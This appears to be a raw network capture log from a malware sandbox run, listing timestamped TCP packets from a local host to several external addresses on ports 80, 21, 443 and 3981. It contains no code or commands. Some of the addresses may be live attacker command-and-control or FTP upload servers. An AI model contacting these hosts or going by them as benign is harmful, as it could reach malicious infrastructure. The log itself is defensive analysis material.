                                          Oct 14, 2024 11:10:29.913400888 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913400888 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913422108 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913433075 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913444042 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913470030 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913470030 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913512945 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913522959 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913532019 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913563013 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913563013 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.913570881 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913633108 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913642883 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.913674116 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943368912 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943442106 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943460941 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943475008 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943486929 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943502903 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943516970 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943528891 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943550110 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943573952 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943582058 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943582058 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943594933 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943614006 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943624973 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943639994 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943650007 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943660975 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943672895 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943675995 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943675995 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943717003 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.943943024 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943970919 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.943983078 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944031954 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944052935 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944063902 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944082975 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944093943 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944104910 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944113970 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944122076 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944122076 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944132090 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944145918 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944158077 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944169998 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944184065 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944184065 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944293976 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944303989 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944315910 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944324017 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944324017 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944381952 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944493055 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944503069 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944547892 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944585085 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944598913 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944627047 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944633961 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944633961 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944638014 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944650888 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.944663048 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.944746971 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:29.945316076 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:29.951144934 CEST4970421192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:29.962349892 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:29.967269897 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:29.967339993 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:29.995862961 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:30.612116098 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:30.612220049 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:30.616982937 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:30.839396954 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:30.839591026 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:30.847254992 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.073117971 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.073286057 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.078227043 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.298346043 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.298640966 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.304115057 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.524405956 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.530569077 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.536755085 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.757215977 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.757395029 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.762278080 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.983119011 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.983587027 CEST4972760613192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.989236116 CEST6061349727191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:31.989335060 CEST4972760613192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.989350080 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:31.994956017 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.215228081 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.261480093 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:32.608495951 CEST6061349727191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.608597994 CEST6061349727191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.608721018 CEST4972760613192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:32.608721018 CEST4972760613192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:32.611712933 CEST2149716191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.612308025 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:32.612901926 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:32.612932920 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:32.612998962 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:32.613226891 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:32.613235950 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:32.613734961 CEST6061349727191.252.83.213192.168.2.5
                                          Oct 14, 2024 11:10:32.617810965 CEST8049711128.201.75.197192.168.2.5
                                          Oct 14, 2024 11:10:32.617858887 CEST4971180192.168.2.5128.201.75.197
                                          Oct 14, 2024 11:10:32.667773962 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:33.104274035 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:33.112867117 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:33.112881899 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:33.511477947 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:33.511722088 CEST44349728188.114.97.3192.168.2.5
                                          Oct 14, 2024 11:10:33.512157917 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:33.513401031 CEST49728443192.168.2.5188.114.97.3
                                          Oct 14, 2024 11:10:33.748306036 CEST4971621192.168.2.5191.252.83.213
                                          Oct 14, 2024 11:10:35.052867889 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.052908897 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.052984953 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.055255890 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.055269957 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.530776978 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.530853033 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.534723043 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.534729004 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.534961939 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.540505886 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.587393045 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.664411068 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.664500952 CEST44349744104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:35.664549112 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:35.665405989 CEST49744443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:39.935933113 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:39.940948009 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:39.941009998 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:39.945995092 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:39.950804949 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:40.244066954 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.244083881 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.244201899 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.246468067 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.246475935 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.710643053 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:40.739051104 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.739120960 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.740464926 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.740470886 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.740714073 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.746568918 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.791393995 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.792711973 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:40.870138884 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.870235920 CEST44349776104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:40.870284081 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.871280909 CEST49776443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:40.902537107 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:40.907574892 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:40.912899017 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:40.912965059 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:40.917912960 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.332804918 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.333873987 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:41.338728905 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.478578091 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.562542915 CEST4978780192.168.2.5178.237.33.50
                                          Oct 14, 2024 11:10:41.567611933 CEST8049787178.237.33.50192.168.2.5
                                          Oct 14, 2024 11:10:41.567675114 CEST4978780192.168.2.5178.237.33.50
                                          Oct 14, 2024 11:10:41.567785978 CEST4978780192.168.2.5178.237.33.50
                                          Oct 14, 2024 11:10:41.572786093 CEST8049787178.237.33.50192.168.2.5
                                          Oct 14, 2024 11:10:41.589596987 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:41.609759092 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.611177921 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:41.616091013 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.616475105 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:41.619996071 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:41.625248909 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:41.792706966 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.206954956 CEST8049787178.237.33.50192.168.2.5
                                          Oct 14, 2024 11:10:42.207449913 CEST4978780192.168.2.5178.237.33.50
                                          Oct 14, 2024 11:10:42.225368023 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.230249882 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.362905025 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.464581966 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.517573118 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.522181034 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.527040005 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.527093887 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.531904936 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.907253981 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.907318115 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.907555103 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.909729004 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909827948 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909838915 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909852028 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909863949 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909877062 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.909884930 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909894943 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.909941912 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.909941912 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.910581112 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.910619974 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.910629034 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.910758972 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.910948038 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:42.912374020 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.912396908 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.912406921 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:42.912539959 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019423962 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019458055 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019479990 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019480944 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019495964 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019515038 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019526958 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019587040 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019587040 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019823074 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019834042 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019853115 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019876003 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019915104 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019927025 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.019939899 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.019947052 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020005941 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.020740986 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020751953 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020771980 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020787001 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.020807981 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020818949 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020829916 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.020839930 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.020860910 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.021658897 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.021671057 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.021691084 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.021696091 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.021725893 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.021738052 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.021770954 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.021770954 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.125288010 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125314951 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125332117 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125340939 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125354052 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.125360966 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125374079 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.125417948 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.125417948 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.126305103 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127233982 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127276897 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127288103 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127300024 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.127391100 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.127461910 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127470970 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127490044 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127568960 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127619028 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127620935 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.127620935 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.127636909 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127664089 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127672911 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127691984 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.127703905 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.127703905 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.128421068 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128463984 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128473997 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.128475904 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128509998 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128520012 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128539085 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.128580093 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.128580093 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.129316092 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.131411076 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139065981 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139079094 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139105082 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139120102 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139131069 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139131069 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139152050 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139163971 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139183044 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139195919 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139195919 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139293909 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139352083 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139568090 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139580965 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139596939 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139611006 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139636040 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139636040 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139642954 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139655113 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139674902 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139687061 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.139709949 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.139709949 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.140404940 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140417099 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140443087 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140455008 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140471935 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140479088 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.140480042 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.140482903 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.140810966 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.207761049 CEST8049787178.237.33.50192.168.2.5
                                          Oct 14, 2024 11:10:43.207840919 CEST4978780192.168.2.5178.237.33.50
                                          Oct 14, 2024 11:10:43.355328083 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.445019007 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.445041895 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.445051908 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.445070982 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.445080996 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.445097923 CEST398149788172.111.213.72192.168.2.5
